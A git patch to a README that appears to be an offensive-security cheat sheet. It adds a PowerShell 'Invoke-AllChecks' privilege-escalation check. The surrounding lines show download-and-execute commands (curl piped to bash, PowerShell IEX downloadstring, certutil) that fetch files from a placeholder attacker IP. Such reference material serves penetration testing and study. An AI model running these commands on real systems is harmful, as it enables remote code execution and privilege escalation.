From 18be7a56b971f24b0ef6a5802dac8a78b8cfda90 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Thu, 1 Sep 2022 13:19:20 -0400 Subject: [PATCH] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 0558756..5aff477 100644 --- a/README.md +++ b/README.md @@ -754,6 +754,7 @@ curl {IP ADDRESS}/{FILE.sh} | bash # Windows - Download file and execute in powershell: powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")' +powershell -c 'Invoke-AllChecks' # Windows - Download file using certutil certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}